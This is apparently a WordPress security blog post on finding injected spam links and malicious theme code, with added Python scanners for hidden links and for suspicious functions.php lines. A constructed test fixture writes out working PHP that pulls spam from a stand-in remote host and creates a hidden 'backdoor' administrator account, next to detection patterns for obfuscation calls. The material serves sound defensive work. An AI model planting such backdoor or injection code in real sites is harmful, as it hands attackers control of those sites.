Detecting malicious code on websites is best done with both human and artificial intelligence. Automated methods have their place, but so do human eyes.
One of our clients' sites was hacked again. This client has not signed up for an ongoing security package, so while they don't benefit from the regular services our security packages provide, they do benefit from our standard secure WordPress set-up.
We know that the weakness of this particular website is their host's lack of care for best security practices. The host, who used to be one of the best of the bunch, has gone downhill in recent years. Their so-called "premium" hosting doesn't allow us access to change any passwords; they use insecure file ownership and permissions and don't grant us permission to change them. Because of those permissions, we can't remove themes that aren't required, and unused files expand the attack surface available to a potential hacker. The hosting service has too many holes, and we can't fix those. So the only viable option at this point is to encourage the client to switch to a secure host. With a secure host and a regular security package, the site will once again be secure.
The client plans to switch hosting companies very soon. In the meantime, they’ve requested that we scan their site for malware regularly.
Why do we need automatic scanners?
After this most recent hack, one of our scanners caught spam links that had been inserted into the database, but none of our automated scanning services could tell us much more about how they got there. We viewed the source code of one scanner, which showed us the code to search for in the database. We did that and removed the spam links manually. The hacker inserted spam links after the first paragraph of text on a page to try to avoid detection.
The spam links inserted used “opacity=0” to hide from website visitors. In this way, the links would only be visible to search engine crawlers.
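As an added illustration (not a scanner from the original post or from any named product), here is a Python scan over wp_posts rows that flags links hidden the way the spam links above were, by opacity:0 and related inline-style tricks, including links that are only hidden because an ancestor element is hidden, and reports which paragraph each one follows. The sample rows are constructed, and the list of hiding patterns is an assumed heuristic, not an exhaustive one.

```python
import re
from html.parser import HTMLParser

# Inline-style tricks used to hide injected links from visitors while leaving
# them readable to search-engine crawlers. Each maps a label to a regex over
# the element's style attribute. (Heuristic list, an assumption of this example.)
HIDING_PATTERNS = {
    "opacity": re.compile(r"opacity\s*:\s*0(?:\.0+)?(?![\d.])", re.I),
    "display": re.compile(r"display\s*:\s*none", re.I),
    "visibility": re.compile(r"visibility\s*:\s*hidden", re.I),
    "font-size": re.compile(r"font-size\s*:\s*0(?:px|em|rem|%)?(?![\d.])", re.I),
    "offscreen": re.compile(r"(?:left|top|text-indent)\s*:\s*-\d{3,}", re.I),
}

# Elements that never get a closing tag; they must not stay on the open-element stack.
VOID_TAGS = {"br", "hr", "img", "input", "meta", "link", "source", "wbr"}


class HiddenLinkFinder(HTMLParser):
    """Walk post HTML and record every <a> that is hidden, either by its own
    style attribute or by a hidden ancestor. Also counts <p> elements seen so
    far, so a finding can say 'inserted after paragraph N'."""

    def __init__(self):
        super().__init__()
        self.open = []        # stack of (tag, hiding_label_or_None)
        self.paragraphs = 0
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        style = attrs.get("style") or ""
        label = next((n for n, p in HIDING_PATTERNS.items() if p.search(style)), None)
        if label is None and "hidden" in attrs:
            label = "hidden-attr"
        if tag == "p":
            self.paragraphs += 1
        if tag == "a":
            # hidden by itself, or by the nearest hidden ancestor still open
            hidden_by = label or next((l for _, l in reversed(self.open) if l), None)
            if hidden_by:
                self.findings.append({"href": attrs.get("href"),
                                      "technique": hidden_by,
                                      "after_paragraph": self.paragraphs})
        if tag not in VOID_TAGS:
            self.open.append((tag, label))

    def handle_endtag(self, tag):
        # pop back to the matching open tag; tolerates sloppy markup
        for i in range(len(self.open) - 1, -1, -1):
            if self.open[i][0] == tag:
                del self.open[i:]
                break


def scan_posts(posts):
    """posts: iterable of (post_id, post_content) rows, e.g. the result of
    SELECT ID, post_content FROM wp_posts. Returns a list of findings."""
    results = []
    for post_id, content in posts:
        finder = HiddenLinkFinder()
        finder.feed(content)
        finder.close()
        results.extend({"post_id": post_id, **f} for f in finder.findings)
    return results


# Constructed sample rows standing in for wp_posts (not data from the hacked site).
SAMPLE_POSTS = [
    (1, "<p>First paragraph.</p>\n<p>Second paragraph with a <a href='/about'>normal link</a>.</p>"),
    (2, '<p>Welcome to our shop.</p>\n<div style="opacity:0"><a href="http://spam.invalid/pills">cheap pills</a></div>\n<p>More text.</p>'),
    (3, '<p>Hello.</p><a style="display: none" href="http://spam.invalid/x">x</a>'),
    (4, '<p>Sale!</p><a href="/sale" style="opacity:0.8">faded but visible</a>'),
]

if __name__ == "__main__":
    for hit in scan_posts(SAMPLE_POSTS):
        print(f"post {hit['post_id']}: {hit['technique']} link to {hit['href']} "
              f"after paragraph {hit['after_paragraph']}")
```

Run over a real database, a cheap SQL pre-filter such as `WHERE post_content LIKE '%opacity%' OR post_content LIKE '%display%'` narrows the rows, but the parser should still see every post it is given in full, because an injected link may be hidden only through a wrapper element several tags above it. A post with a finding is a candidate for human review, not an automatic clean-up target, since legitimate themes sometimes hide elements too.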
Why do we need human methods for detecting malicious code?
Our automated scanning services were unable to detect malicious code in the files. I manually reviewed files on the server, and found these two sections of malicious code in the theme functions.php file. The hacker inserted the malicious code in the middle of the file, to better hide it.
This function inserts spam via the footer, by getting the spam contents from a separate website and outputting them on our client’s website. The $url5 is our client’s website address, and the file_get_contents function pulls spam content from another website, from a file using our client’s website name:
This function, also located in the theme functions.php file, programmatically creates a new WordPress admin user. (This user did not exist at this time but was found in a previous hack clean-up):
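The two functions above are not reproduced on this page, so what follows is an added example of the kind of check a reviewer could run over a theme's functions.php; it is not the site's own code and not the code that was found. It is a Python scan for the behaviours described (remote content pulled with file_get_contents, output hooked on wp_footer, wp_create_user/set_role('administrator')) plus common obfuscation calls, combined with a line-level diff against a pristine copy of the same theme version so that hits on inserted lines are surfaced first. The PRISTINE and INJECTED fixtures are constructed to model the description, and the signature list is an assumed heuristic.

```python
import re
import difflib

# Heuristic signatures for the behaviours the article describes, plus common
# obfuscation. Hits are pointers for a human reviewer, not verdicts: wp_footer
# hooks and file_get_contents both have legitimate uses in themes.
SIGNATURES = [
    ("remote-fetch", re.compile(
        r"\b(?:file_get_contents|fopen|curl_init|wp_remote_get)\s*\(\s*(?:['\"]https?://|\$)", re.I)),
    ("admin-user-creation", re.compile(
        r"\b(?:wp_create_user|wp_insert_user)\s*\(|set_role\s*\(\s*['\"]administrator"
        r"|['\"]role['\"]\s*=>\s*['\"]administrator", re.I)),
    ("footer-hook", re.compile(r"add_action\s*\(\s*['\"]wp_footer['\"]", re.I)),
    ("obfuscation", re.compile(r"\b(?:eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
]


def scan_php(source, path="functions.php"):
    """Return (path, line_no, category, line_text) for every signature hit."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for category, pattern in SIGNATURES:
            if pattern.search(line):
                hits.append((path, n, category, line.strip()))
    return hits


def inserted_lines(pristine, current):
    """Lines present in the current file but not in the pristine copy,
    as (line_no_in_current, text). Content diff, not mtime or size: those
    are easy for an attacker to leave untouched."""
    cur = current.splitlines()
    matcher = difflib.SequenceMatcher(None, pristine.splitlines(), cur)
    added = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            added.extend((j + 1, cur[j]) for j in range(j1, j2))
    return added


def prioritised(pristine, current, path="functions.php"):
    """Signature hits that land on lines absent from the pristine copy:
    the first things a human should read."""
    added = {n for n, _ in inserted_lines(pristine, current)}
    return [h for h in scan_php(current, path) if h[1] in added]


# Constructed fixture: a small, clean theme functions.php (not a real theme).
PRISTINE = """<?php
function mytheme_setup() {
    add_theme_support('title-tag');
    add_theme_support('post-thumbnails');
}
add_action('after_setup_theme', 'mytheme_setup');

function mytheme_scripts() {
    wp_enqueue_style('mytheme-style', get_stylesheet_uri());
}
add_action('wp_enqueue_scripts', 'mytheme_scripts');
"""

# Constructed fixture modelled on the article's description: footer spam fetched
# from a remote host using the site's own hostname, and an admin user created on
# init. Hostnames use the reserved .invalid TLD; credentials are placeholders.
INJECTED = """function theme_footer_links() {
    $url5 = $_SERVER['HTTP_HOST'];
    echo file_get_contents('http://spam-source.invalid/' . $url5 . '.txt');
}
add_action('wp_footer', 'theme_footer_links');

function theme_init_user() {
    if (!username_exists('backdoor')) {
        $id = wp_create_user('backdoor', 'CHANGEME', 'x@spam-source.invalid');
        (new WP_User($id))->set_role('administrator');
    }
}
add_action('init', 'theme_init_user');

"""

# The injection sits in the middle of the file, between two legitimate functions.
INFECTED = PRISTINE.replace("function mytheme_scripts", INJECTED + "function mytheme_scripts", 1)

if __name__ == "__main__":
    for path, n, category, text in prioritised(PRISTINE, INFECTED):
        print(f"{path}:{n} [{category}] {text}")
```

The diff step only works when the pristine copy is the same theme version as the one deployed, obtained from the vendor rather than from the compromised server. Without it, scan_php alone still lists the candidates, at the cost of more legitimate hits to read through, which is exactly where the human review the post argues for comes in.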
The failure of the automated methods to catch these functions is our reason for not relying on automated methods alone. In website security, multi-layer security is a must.
With both automated methods and human eyes, detecting malicious code becomes quicker and more efficient. Remember that artificial intelligence is always based on human intelligence. So machines are faster, but humans will always remain one step ahead.